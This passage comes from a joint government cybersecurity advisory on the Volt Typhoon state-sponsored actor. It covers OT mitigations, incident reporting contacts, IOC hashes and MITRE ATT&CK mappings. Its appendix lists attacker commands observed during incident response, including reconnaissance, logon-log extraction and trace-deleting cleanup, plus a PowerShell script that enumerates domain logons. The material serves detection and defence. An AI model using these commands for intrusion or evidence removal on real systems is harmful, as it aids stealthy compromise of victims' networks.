3628. <li><strong>Tailor the training to network IT personnel/administrators and other key staff based on relevant organizational cyber threats and TTPs</strong>, such as Volt Typhoon. For example, communicate that Volt Typhoon actors are known to target personal email accounts of IT staff, and encourage staff to protect their personal email accounts by using strong passwords and implementing MFA.</li>
3629. <li>In addition to basic cybersecurity training, <strong>ensure personnel who maintain or secure OT as part of their regular duties receive OT-specific cybersecurity training</strong> on at least an annual basis [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#OTCybersecurityTraining2J" title="Cybersecurity Performance Goals (CPGs)">CPG 2J</a>].</li>
3630. <li><strong>Educate users about the risks associated with storing unprotected passwords</strong>.</li>
3631. </ul>
3632. </li>
3633. </ul>
3634. <h4><strong>OT Administrators and Defenders</strong></h4>
3635. <ul>
3636. <li><strong>Change default passwords </strong>[<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#ChangingDefaultPasswords2A" title="Cybersecurity Performance Goals (CPGs)">CPG 2A</a>] and ensure they meet the policy requirements for complexity. If the asset’s password cannot be changed, implement compensating controls for the device; for example, segment the device into separate enclaves and implement increased monitoring and logging.</li>
3637. <li><strong>Require that passwords for all OT password-protected assets be at least 15 characters</strong>, when technically feasible. In instances where minimum passwords lengths are not technically feasible (for example, assets in remote locations), apply compensating controls, record the controls, and log all login attempts. [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#MinimumPasswordStrength2B" title="Cybersecurity Performance Goals (CPGs)">CPG 2B</a>].</li>
3638. <li><strong>Enforce strict access policies for accessing OT networks</strong>. Develop strict operating procedures for OT operators that details secure configuration and usage.</li>
3639. <li><strong>Segment OT assets from IT environments</strong> by [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#NetworkSegmentation2F" title="Cybersecurity Performance Goals (CPGs)">CPG 2F</a>]:
3640. <ul>
3641. <li><strong>Denying all connections to the OT network by default </strong>unless explicitly allowed (e.g., by IP address and port) for specific system functionality.</li>
3642. <li><strong>Requiring necessary communications paths between IT and OT networks to pass through an intermediary</strong>, such as a properly configured firewall, bastion host, “jump box,” or a demilitarized zone (DMZ), which is closely monitored, captures network logs, and only allows connections from approved assets.</li>
3643. </ul>
3644. </li>
3645. <li><strong>Closely monitor all connections into OT networks for misuse, anomalous activity, or OT protocols</strong>.</li>
3646. <li><strong>Monitor for unauthorized controller change attempts</strong>. Implement integrity checks of controller process logic against a known good baseline. Ensure process controllers are prevented from remaining in remote program mode while in operation if possible.</li>
3647. <li><strong>Lock or limit set points in control processes to reduce the consequences of unauthorized controller access</strong>.</li>
3648. <li><strong>Be prepared </strong>by:
3649. <ul>
3650. <li><strong>Determining your critical operational processes’ reliance on key IT infrastructure</strong>:
3651. <ul>
3652. <li>Maintain and regularly update an inventory of all organizational OT assets.</li>
3653. <li>Understand and evaluate cyber risk on “as-operated” OT assets.</li>
3654. <li>Create an accurate “as-operated” OT network map and identify OT and IT network inter-dependencies.</li>
3655. </ul>
3656. </li>
3657. <li><strong>Identifying a resilience plan that addresses how to operate if you lose access to or control of the IT and/or OT environment</strong>.
3658. <ul>
3659. <li>Plan for how to continue operations if a control system is malfunctioning, inoperative, or actively acting contrary to the safe and reliable operation of the process.</li>
3660. <li>Develop workarounds or manual controls to ensure ICS networks can be isolated if the connection to a compromised IT environment creates risk to the safe and reliable operation of OT processes.</li>
3661. </ul>
3662. </li>
3663. <li><strong>Create and regularly exercise an incident response plan</strong>.
3664. <ul>
3665. <li>Regularly test manual controls so that critical functions can be kept running if OT networks need to be taken offline.</li>
3666. </ul>
3667. </li>
3668. <li><strong>Implement regular data backup procedures</strong> on OT networks.
3669. <ul>
3670. <li>Regularly test backup procedures.</li>
3671. </ul>
3672. </li>
3673. </ul>
3674. </li>
3675. <li><strong>Follow risk-informed guidance</strong> in the joint advisory <a href="https://media.defense.gov/2020/Jul/23/2002462846/-1/-1/0/OT_ADVISORY-DUAL-OFFICIAL-20200722.PDF" title="NSA and CISA Recommend Immediate Actions to Reduce Exposure Across all Operational Technologies and Control Systems">NSA and CISA Recommend Immediate Actions to Reduce Exposure Across all Operational Technologies and Control Systems</a>, the NSA advisory <a href="https://media.defense.gov/2021/Apr/29/2002630479/-1/-1/0/CSA_STOP-MCA-AGAINST-OT_UOO13672321.PDF" title="Stop Malicious Cyber Activity Against Connected Operational Technology">Stop Malicious Cyber Activity Against Connected Operational Technology</a>.</li>
3676. </ul>
3677. <h3><strong>CONTACT INFORMATION</strong></h3>
3678. <p><strong>US organizations:</strong> To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact:</p>
3679. <ul>
3680. <li>CISA’s 24/7 Operations Center at <a href="mailto:report@cisa.gov" title="Report to CISA">Report@cisa.gov</a> or 1-844-Say-CISA (1-844-729-2472) or your<a href="https://www.fbi.gov/contact-us/field-offices" title="Field Offices"> local FBI field office</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.</li>
3681. <li>For NSA client requirements or general cybersecurity inquiries, contact <a href="mailto:Cybersecurity_Requests@nsa.gov" title="Cybersecurity Requests">Cybersecurity_Requests@nsa.gov</a>.</li>
3682. <li>Water and Wastewater Systems Sector organizations, contact the EPA Water Infrastructure and Cyber Resilience Division at <a href="mailto:watercyberta@epa.gov" title="Report to the Environmental Protection Agency">watercyberta@epa.gov</a> to voluntarily provide situational awareness.</li>
3683. <li>Entities required to report incidents to DOE should follow established reporting requirements, as appropriate. For other energy sector inquiries, contact <a href="mailto:EnergySRMA@hq.doe.gov" title="Report to the Department of Energy">EnergySRMA@hq.doe.gov</a>.</li>
3684. <li>For transportation entities regulated by TSA, report to CISA Central in accordance with the requirements found in applicable Security Directives, Security Programs, or TSA Order.</li>
3685. </ul>
3686. <p><strong>Australian organizations:</strong> Visit <a href="https://www.cyber.gov.au/" title="Australian Signals Directorate’s (ASD’s) Australian Cyber Security Centre (ACSC)">cyber.gov.au</a> or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.</p>
3687. <p><strong>Canadian organizations:</strong> Report incidents by emailing CCCS at <a href="mailto:contact@cyber.gc.ca" title="Report to the Canadian Centre for Cyber Security">contact@cyber.gc.ca</a>.</p>
3688. <p><strong>New Zealand organizations:</strong> Report cyber security incidents to <a href="mailto:incidents@ncsc.govt.nz" title="Report to New Zealand's National Cyber Security Centre">incidents@ncsc.govt.nz</a> or call 04 498 7654.</p>
3689. <p><strong>United Kingdom organizations</strong>: Report a significant cyber security incident: <a href="https://www.ncsc.gov.uk/section/about-this-website/contact-us" title="Report to the United Kingdom's National Cyber Security Centre">ncsc.gov.uk/report-an-incident</a> (monitored 24 hours) or, for urgent assistance, call 03000 200 973.</p>
3690. <h3><strong>VALIDATE SECURITY CONTROLS</strong></h3>
3691. <p>In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.</p>
3692. <p>To get started:</p>
3693. <ol>
3694. <li>Select an ATT&CK technique described in this advisory (see Table 5 through Table 17).</li>
3695. <li>Align your security technologies against the technique.</li>
3696. <li>Test your technologies against the technique.</li>
3697. <li>Analyze your detection and prevention technologies’ performance.</li>
3698. <li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
3699. <li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
3700. </ol>
3701. <p>The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.</p>
3702. <h3><strong>REFERENCES</strong></h3>
3703. <p>[1] <a href="https://fofa.info/" title="FOFA Search Engine">fofa</a><br>[2] <a href="https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/" title="Volt Typhoon targets US critical infrastructure with living-off-the-land techniques">Microsoft: Volt Typhoon targets US critical infrastructure with living-off-the-land techniques</a><br>[3] <a href="https://github.com/fatedier/frp" title="fatedier / frp">GitHub - fatedier/frp: A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet</a><br>[4] <a href="https://github.com/sandialabs/gait" title="sandialabs / gait">GitHub - sandialabs/gait: Zeek Extension to Collect Metadata for Profiling of Endpoints and Proxies</a><br>[5] <a href="https://zeek.org/" title="Open Source Network Security Monitoring Tool">The Zeek Network Security Monitor</a></p>
3704. <h3><strong>RESOURCES</strong></h3>
3705. <p>Microsoft: <a href="https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/" title="Volt Typhoon targets US critical infrastructure with living-off-the-land techniques">Volt Typhoon targets US critical infrastructure with living-off-the-land techniques</a><br>Secureworks: <a href="https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations">Chinese Cyberespionage Group BRONZE SILHOUETTE Targets U.S. Government and Defense Organizations</a></p>
3706. <h3><strong>DISCLAIMER</strong></h3>
3707. <p>The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies.</p>
3708. <h3><strong>ACKNOWLEDGEMENTS</strong></h3>
3709. <p>Fortinet and Microsoft contributed to this advisory.</p>
3710. <h3><strong>VERSION HISTORY</strong></h3>
3711. <p><strong>February 7, 2024:</strong> Initial Version.<br><strong>March 7, 2024:</strong> Updated Mitigations section to add recommendation on “end of life” technology.</p>
3712. <h3><strong>APPENDIX A: VOLT TYPHOON OBSERVED COMMANDS / LOTL ACTIVITY</strong></h3>
3713. <p>See Table 2 and Table 3 for Volt Typhoon commands and PowerShell scripts observed by the U.S. authoring agencies during incident response activities. For additional commands used by Volt Typhoon, see joint advisory <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a" title="People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection">People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection</a>.</p>
3714. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
3715. <caption><em>Table 2: Volt Typhoon Observed Commands in PowerShell Console History</em></caption>
3716. <thead>
3717. <tr>
3718. <th role="columnheader" data-tablesaw-priority="persist"><strong>Command/Script</strong></th>
3719. <th role="columnheader"><strong>Description/Use</strong></th>
3720. </tr>
3721. </thead>
3722. <tbody>
3723. <tr>
3724. <td>Get-EventLog security -instanceid 4624 -after {redacted date} | fl * | Out-File 'C:\users\public\documents\user.dat'  </td>
3725. <td>PowerShell command extracts security log entries with the Event ID <code>4624</code> after a specified date. The output is formatted (<code>fl *</code>) and saved to <code>user.dat</code>. Potentially used to analyze logon patterns and identify potential targets for lateral movement.</td>
3726. </tr>
3727. <tr>
3728. <td>Get-EventLog security -instanceid 4624 | Where-Object {$_.message.contains('{redacted user account}')} | select -First 1 | fl *  </td>
3729. <td>PowerShell command extracts security log entries with the Event ID <code>4624</code> and filters them to include only those containing a specific user account, selecting the first instance of such an event.</td>
3730. </tr>
3731. <tr>
3732. <td>wminc process get name,processid</td>
3733. <td>Appears to be an attempt to use the wmic command but with a misspelling (<code>wminc</code> instead of <code>wmic</code>). This command, as it stands, would not execute successfully and would return an error in a typical Windows environment. This could indicate a mistake made during manual input.</td>
3734. </tr>
3735. <tr>
3736. <td>wmic process get name,processid  </td>
3737. <td>WMI command lists all running processes with process names and process IDs. Potentially used to find process IDs needed for other operations, like memory dumping.</td>
3738. </tr>
3739. <tr>
3740. <td>tasklist /v  </td>
3741. <td>Command displays detailed information about currently running processes, including the name, PID, session number, and memory usage.</td>
3742. </tr>
3743. <tr>
3744. <td>taskkill /f /im rdpservice.exe</td>
3745. <td>Command forcibly terminates the process <code>rdpservice.exe</code>. Potentially used as a cleanup activity post-exploitation.</td>
3746. </tr>
3747. <tr>
3748. <td>ping -n 1 {redacted IP address}</td>
3749. <td>Command sends one ICMP echo request to a specified IP address.</td>
3750. </tr>
3751. <tr>
3752. <td>ping -n 1 -w 1 {redacted IP address}</td>
3753. <td>Command sends one ICMP echo request to a specified IP address with a timeout (<code>-w</code>) of 1 millisecond.</td>
3754. </tr>
3755. <tr>
3756. <td>net user</td>
3757. <td>Lists all user accounts on the local machine or domain, useful for quickly viewing existing user accounts.</td>
3758. </tr>
3759. <tr>
3760. <td>
3761. <p>quser</p>
3762. <p> </p>
3763. <p>query user</p>
3764. </td>
3765. <td>Displays information about user sessions on a system, aiding in identifying active users or sessions.</td>
3766. </tr>
3767. <tr>
3768. <td>net start</td>
3769. <td>Lists all active services.</td>
3770. </tr>
3771. <tr>
3772. <td>cmd</td>
3773. <td>Opens a new instance of the command prompt.</td>
3774. </tr>
3775. <tr>
3776. <td>cd [Redacted Path]</td>
3777. <td>Changes the current directory to a specified path, typically for navigating file systems.</td>
3778. </tr>
3779. <tr>
3780. <td>Remove-Item .\Thumbs.db</td>
3781. <td>PowerShell command to delete the <code>Thumbs.db</code> file, possibly for cleanup or removing traces.</td>
3782. </tr>
3783. <tr>
3784. <td>move .\Thumbs.db ttt.dat</td>
3785. <td>Relocates and renames the file <code>Thumbs.db</code> in the current directory to <code>ttt.dat</code> within the same directory.</td>
3786. </tr>
3787. <tr>
3788. <td>del .\Thumbs.db /f /s /q</td>
3789. <td>Force deletes <code>Thumbs.db</code> files from the current directory and all subdirectories, part of cleanup operations to erase traces.</td>
3790. </tr>
3791. <tr>
3792. <td>del ??</td>
3793. <td>Deletes files with two-character names, potentially a targeted cleanup command.</td>
3794. </tr>
3795. <tr>
3796. <td>del /?</td>
3797. <td>Displays help information for the <code>del</code> command.</td>
3798. </tr>
3799. <tr>
3800. <td>exit</td>
3801. <td>Terminates the command prompt session.</td>
3802. </tr>
3803. <tr>
3804. <td>ipconfig</td>
3805. <td>Retrieves network configuration details, helpful for discovery and mapping the victim's network.</td>
3806. </tr>
3807. <tr>
3808. <td>net time /dom</td>
3809. <td>Queries or sets the network time for a domain, potentially used for reconnaissance or to manipulate system time.</td>
3810. </tr>
3811. <tr>
3812. <td>netstta -ano</td>
3813. <td>Intended as <code>netstat -ano</code>; a mistyped command indicating a potential operational error.</td>
3814. </tr>
3815. <tr>
3816. <td>netstat -ano</td>
3817. <td>Lists active network connections and processes, helpful for identifying communication channels and potential targets.</td>
3818. </tr>
3819. <tr>
3820. <td>type .\Notes.txt</td>
3821. <td>Displays the contents of <code>Notes.txt</code>, possibly used for extracting specific information or intelligence gathering.</td>
3822. </tr>
3823. <tr>
3824. <td>logoff</td>
3825. <td>Logs off the current user session.</td>
3826. </tr>
3827. </tbody>
3828. </table>
3829. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
3830. <caption><em>Table 3: Volt Typhoon Observed PowerShell Scripts</em></caption>
3831. <thead>
3832. <tr>
3833. <th role="columnheader" data-tablesaw-priority="persist"><strong>Script name and location</strong></th>
3834. <th role="columnheader"><strong>Contents</strong></th>
3835. <th role="columnheader"><strong>Description/Use</strong></th>
3836. </tr>
3837. </thead>
3838. <tbody>
3839. <tr>
3840. <td>C:\{redacted}\<br>logins.ps1</td>
3841. <td>
3842. <p># Find DC list from Active Directory</p>
3843. <p>$DCs = Get-ADDomainController -Filter *</p>
3844. <p> </p>
3845. <p># Define time for report (default is 1 day)</p>
3846. <p>$startDate = (get-date).AddDays(-1)</p>
3847. <p> </p>
3848. <p># Store successful logon events from security logs with the specified dates and workstation/IP in an array</p>
3849. <p>foreach ($DC in $DCs){</p>
3850. <p>$slogonevents = Get-Eventlog -LogName Security -ComputerName $DC.Hostname -after $startDate | where {$_.eventID -eq 4624 }}</p>
3851. <p> </p>
3852. <p># Crawl through events; print all logon history with type, date/time, status, account name, computer and IP address if user logged on remotely</p>
3853. <p> </p>
3854. <p> foreach ($e in $slogonevents){</p>
3855. <p> # Logon Successful Events</p>
3856. <p> # Local (Logon Type 2)</p>
3857. <p> if (($e.EventID -eq 4624 ) -and ($e.ReplacementStrings[8] -eq 2)){</p>
3858. <p> write-host "Type: Local Logon`tDate: "$e.TimeGenerated "`tStatus: Success`tUser: "$e.ReplacementStrings[5] "`tWorkstation: "$e.ReplacementStrings[11]</p>
3859. <p> }</p>
3860. <p> # Remote (Logon Type 10)</p>
3861. <p> if (($e.EventID -eq 4624 ) -and ($e.ReplacementStrings[8] -eq 10)){</p>
3862. <p> write-host "Type: Remote Logon`tDate: "$e.TimeGenerated "`tStatus: Success`tUser: "$e.ReplacementStrings[5] "`tWorkstation: "$e.ReplacementStrings[11] "`tIP Address: "$e.ReplacementStrings[18]</p>
3863. <p> }}</p>
3864. </td>
3865. <td>The script is designed for user logon discovery in a Windows Active Directory environment. It retrieves a list of DCs and then queries security logs on these DCs for successful logon events (Event ID 4624) within the last day. The script differentiates between local (Logon Type 2) and remote (Logon Type 10) logon events. For each event, it extracts and displays details including the logon type, date/time of logon, status, account name, and the workstation or IP address used for the logon. Volt Typhoon may be leveraging this script to monitor user logon activities across the network, potentially to identify patterns, gather credentials, or track the movement of users and administrators within the network.</td>
3866. </tr>
3867. </tbody>
3868. </table>
3869. <h3><strong>APPENDIX B: INDICATORS OF COMPROMISE</strong></h3>
3870. <p>See Table 4 for Volt Typhoon IOCs obtained by the U.S. authoring agencies during incident response activities.</p>
3871. <p>Note: See <a href="https://www.cisa.gov/news-events/analysis-reports/ar24-038a" title="MAR-10448362-1.v1 Volt Typhoon">MAR-10448362-1.v1</a> for more information on this malware.</p>
3872. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
3873. <caption><em>Table 4: Volt Typhoon Malicious Files and Associated Hashes</em></caption>
3874. <thead>
3875. <tr>
3876. <th role="columnheader" data-tablesaw-priority="persist"><strong>File Name</strong></th>
3877. <th role="columnheader"><strong>Description</strong></th>
3878. <th role="columnheader"><strong>MD5</strong></th>
3879. <th role="columnheader"><strong>Hashes (SHA256)</strong></th>
3880. </tr>
3881. </thead>
3882. <tbody>
3883. <tr>
3884. <td>BrightmetricAgent.exe</td>
3885. <td>
3886. <p>The file is an FRP that could be used to reveal servers situated behind a network firewall or obscured through Network Address Translation (NAT).</p>
3887. <p> </p>
3888. </td>
3889. <td>fd41134e8ead1c18ccad27c62a260aa6</td>
3890. <td>edc0c63065e88ec96197c8d7a40662a15a812a9583dc6c82b18ecd7e43b13b70</td>
3891. </tr>
3892. <tr>
3893. <td>SMSvcService.exe</td>
3894. <td>The file is a Windows executable "FRPC” designed to open a reverse proxy between the compromised system and the threat actor(s) C2 server.</td>
3895. <td>b1de37bf229890ac181bdef1ad8ee0c2</td>
3896. <td>99b80c5ac352081a64129772ed5e1543d94cad708ba2adc46dc4ab7a0bd563f1</td>
3897. </tr>
3898. </tbody>
3899. </table>
3900. <p><strong>APPENDIX C: MITRE ATT&CK TACTICS AND TECHNIQUES</strong></p>
3901. <p>See Table 5 through Table 17 for all referenced threat actor tactics and techniques in this advisory.</p>
3902. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
3903. <caption><em>Table 5: Volt Typhoon actors ATT&CK Techniques for Enterprise – Reconnaissance</em></caption>
3904. <thead>
3905. <tr>
3906. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Reconnaissance</strong></th>
3907. <th scope="col" role="columnheader"> </th>
3908. <th scope="col" role="columnheader"> </th>
3909. </tr>
3910. <tr>
3911. <th role="columnheader"><strong>Technique Title</strong></th>
3912. <th role="columnheader"><strong>ID</strong></th>
3913. <th role="columnheader"><strong>Use</strong></th>
3914. </tr>
3915. </thead>
3916. <tbody>
3917. <tr>
3918. <td>Gather Victim Host Information</td>
3919. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1592/" title="Gather Victim Host Information">T1592</a></td>
3920. <td>Volt Typhoon conducts extensive pre-compromise reconnaissance. This includes web searches, including victim-owned sites, for victim host, identity, and network information, especially for information on key network and IT administrators.</td>
3921. </tr>
3922. <tr>
3923. <td>Gather Victim Identity Information</td>
3924. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1589/" title="Gather Victim Identity Information">T1589</a></td>
3925. <td>Volt Typhoon conducts extensive pre-compromise reconnaissance to learn about the target organization’s staff.</td>
3926. </tr>
3927. <tr>
3928. <td>Gather Victim Identity Information: Email Addresses</td>
3929. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1589/002/" title="Gather Victim Identity Information: Email Addresses">T1589.002</a></td>
3930. <td>Volt Typhoon targets the personal emails of key network and IT staff.</td>
3931. </tr>
3932. <tr>
3933. <td>Gather Victim Network Information</td>
3934. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1590/" title="Gather Victim Network Information">T1590</a></td>
3935. <td>Volt Typhoon conducts extensive pre-compromise reconnaissance to learn about the target organization’s network.</td>
3936. </tr>
3937. <tr>
3938. <td>Gather Victim Org Information</td>
3939. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1591/" title="Gather Victim Org Information">T1591</a></td>
3940. <td>Volt Typhoon conducts extensive pre-compromise reconnaissance to learn about the target organization.</td>
3941. </tr>
3942. <tr>
3943. <td>Search Open Websites/Domains</td>
3944. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1593/" title="Search Open Websites/Domains">T1593</a></td>
3945. <td>Volt Typhoon conducts extensive pre-compromise reconnaissance. This includes web searches, including victim-owned sites, for victim host, identity, and network information, especially for information on key network and IT administrators.</td>
3946. </tr>
3947. <tr>
3948. <td>Search Victim-Owned Websites</td>
3949. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1594/" title="Search Victim-Owned Websites">T1594</a></td>
3950. <td>Volt Typhoon conducts extensive pre-compromise reconnaissance. This includes web searches, including victim-owned sites, for victim host, identity, and network information, especially for information on key network and IT administrators.</td>
3951. </tr>
3952. </tbody>
3953. </table>
3954. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
3955. <caption><em>Table 6: Volt Typhoon actors ATT&CK Techniques for Enterprise – Resource Development</em></caption>
3956. <thead>
3957. <tr>
3958. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Resource Development</strong></th>
3959. <th scope="col" role="columnheader"> </th>
3960. <th scope="col" role="columnheader"> </th>
3961. </tr>
3962. <tr>
3963. <th role="columnheader"><strong>Technique Title</strong></th>
3964. <th role="columnheader"><strong>ID</strong></th>
3965. <th role="columnheader"><strong>Use</strong></th>
3966. </tr>
3967. </thead>
3968. <tbody>
3969. <tr>
3970. <td>Acquire Infrastructure: Botnet</td>
3971. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1583/005/" title="Acquire Infrastructure: Botnet">T1583.003</a></td>
3972. <td>Volt Typhoon uses multi-hop proxies for command-and-control infrastructure. The proxy is typically composed of Virtual Private Servers (VPSs) or small office/home office (SOHO) routers.</td>
3973. </tr>
3974. <tr>
3975. <td>Compromise Infrastructure: Botnet</td>
3976. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1584/005/" title="Compromise Infrastructure: Botnet">T1584.005</a></td>
3977. <td>Volt Typhoon used Cisco and NETGEAR end-of-life SOHO routers implanted with KV Botnet malware to support their operations.</td>
3978. </tr>
3979. <tr>
3980. <td>Compromise Infrastructure: Server</td>
3981. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1584/004/" title="Compromise Infrastructure: Server">T1584.004</a></td>
3982. <td>Volt Typhoon has redirected specific port traffic to their proxy infrastructure, effectively converting the PRTG’s Detection Guidance server into a proxy for their C2 traffic.</td>
3983. </tr>
3984. <tr>
3985. <td>Develop Capabilities: Exploits</td>
3986. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1587/004/" title="Develop Capabilities: Exploits">T1587.004</a></td>
3987. <td>Volt Typhoon uses publicly available exploit code, but is also adept at discovering and exploiting vulnerabilities as zero days.</td>
3988. </tr>
3989. <tr>
3990. <td>Obtain Capabilities: Exploits</td>
3991. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1588/005/" title="Obtain Capabilities: Exploits">T1588.005</a></td>
3992. <td>Volt Typhoon uses publicly available exploit code, but is also adept at discovering and exploiting vulnerabilities as zero days.</td>
3993. </tr>
3994. </tbody>
3995. </table>
3996. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
3997. <caption><em>Table 7: Volt Typhoon actors ATT&CK Techniques for Enterprise – Initial Access</em></caption>
3998. <thead>
3999. <tr>
4000. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Initial Access</strong></th>
4001. <th scope="col" role="columnheader"> </th>
4002. <th scope="col" role="columnheader"> </th>
4003. </tr>
4004. <tr>
4005. <th role="columnheader"><strong>Technique Title</strong></th>
4006. <th role="columnheader"><strong>ID</strong></th>
4007. <th role="columnheader"><strong>Use</strong></th>
4008. </tr>
4009. </thead>
4010. <tbody>
4011. <tr>
4012. <td>Exploit Public-Facing Application</td>
4013. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1190/" target="_blank" title="Exploit Public-Facing Application">T1190</a></td>
4014. <td>Volt Typhoon commonly exploits vulnerabilities in networking appliances such as Fortinet, Ivanti (formerly Pulse Secure), NETGEAR, Citrix, and Cisco.</td>
4015. </tr>
4016. <tr>
4017. <td>External Remote Services</td>
4018. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1133/" title="External Remote Services">T1133</a></td>
4019. <td>Volt Typhoon often uses VPN sessions to securely connect to victim environments, enabling discreet follow-on intrusion activities.</td>
4020. </tr>
4021. </tbody>
4022. </table>
4023. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4024. <caption><em>Table 8: Volt Typhoon actors ATT&CK Techniques for Enterprise – Execution</em></caption>
4025. <thead>
4026. <tr>
4027. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Execution</strong></th>
4028. <th scope="col" role="columnheader"> </th>
4029. <th scope="col" role="columnheader"> </th>
4030. </tr>
4031. <tr>
4032. <th role="columnheader"><strong>Technique Title</strong></th>
4033. <th role="columnheader"><strong>ID</strong></th>
4034. <th role="columnheader"><strong>Use</strong></th>
4035. </tr>
4036. </thead>
4037. <tbody>
4038. <tr>
4039. <td>Command and Scripting Interpreter</td>
4040. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1059/" title="Command and Scripting Interpreter">T1059</a></td>
4041. <td>Volt Typhoon uses hands-on-keyboard execution for their malicious activity via the command-line.</td>
4042. </tr>
4043. <tr>
4044. <td>Command and Scripting Interpreter: PowerShell</td>
4045. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a></td>
4046. <td>Volt Typhoon has executed clients via PowerShell.</td>
4047. </tr>
4048. <tr>
4049. <td>Command and Scripting Interpreter: Unix Shell</td>
4050. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1059/004" title="Command and Scripting Interpreter: Unix Shell">T1059.004</a></td>
4051. <td>Volt Typhoon has used <code>Brightmetricagent.exe</code>, which contains multiplexer libraries that can bi-directionally stream data over through NAT networks and contains a command-line interface (CLI) library that can leverage command shells such as PowerShell, Windows Management, Instrumentation (WMI), and Z Shell (zsh).</td>
4052. </tr>
4053. <tr>
4054. <td>Windows Management Instrumentation</td>
4055. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1047/" title="Windows Management Instrumentation">T1047</a></td>
4056. <td>Volt Typhoon has used Windows Management Instrumentation Console (WMIC) commands.</td>
4057. </tr>
4058. </tbody>
4059. </table>
4060. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4061. <caption><em>Table 9: Volt Typhoon actors ATT&CK Techniques for Enterprise – Persistence</em></caption>
4062. <thead>
4063. <tr>
4064. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Persistence</strong></th>
4065. <th scope="col" role="columnheader"> </th>
4066. <th scope="col" role="columnheader"> </th>
4067. </tr>
4068. <tr>
4069. <th role="columnheader"><strong>Technique Title</strong></th>
4070. <th role="columnheader"><strong>ID</strong></th>
4071. <th role="columnheader"><strong>Use</strong></th>
4072. </tr>
4073. </thead>
4074. <tbody>
4075. <tr>
4076. <td>Valid Accounts</td>
4077. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1078/" title="Valid Accounts">T1078</a></td>
4078. <td>Volt Typhoon primarily relies on valid credentials for persistence.</td>
4079. </tr>
4080. </tbody>
4081. </table>
4082. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4083. <caption><em>Table 10: Volt Typhoon actors ATT&CK Techniques for Enterprise – Privilege Escalation</em></caption>
4084. <thead>
4085. <tr>
4086. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Privilege Escalation</strong></th>
4087. <th scope="col" role="columnheader"> </th>
4088. <th scope="col" role="columnheader"> </th>
4089. </tr>
4090. <tr>
4091. <th role="columnheader"><strong>Technique Title</strong></th>
4092. <th role="columnheader"><strong>ID</strong></th>
4093. <th role="columnheader"><strong>Use</strong></th>
4094. </tr>
4095. </thead>
4096. <tbody>
4097. <tr>
4098. <td>Exploitation for Privilege Escalation</td>
4099. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1068/" title="Exploitation for Privilege Escalation">T1068</a></td>
4100. <td>Volt Typhoon first obtains credentials from public-facing appliances after gaining initial access by exploiting privilege escalation vulnerabilities in the operating system or network services.</td>
4101. </tr>
4102. </tbody>
4103. </table>
4104. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
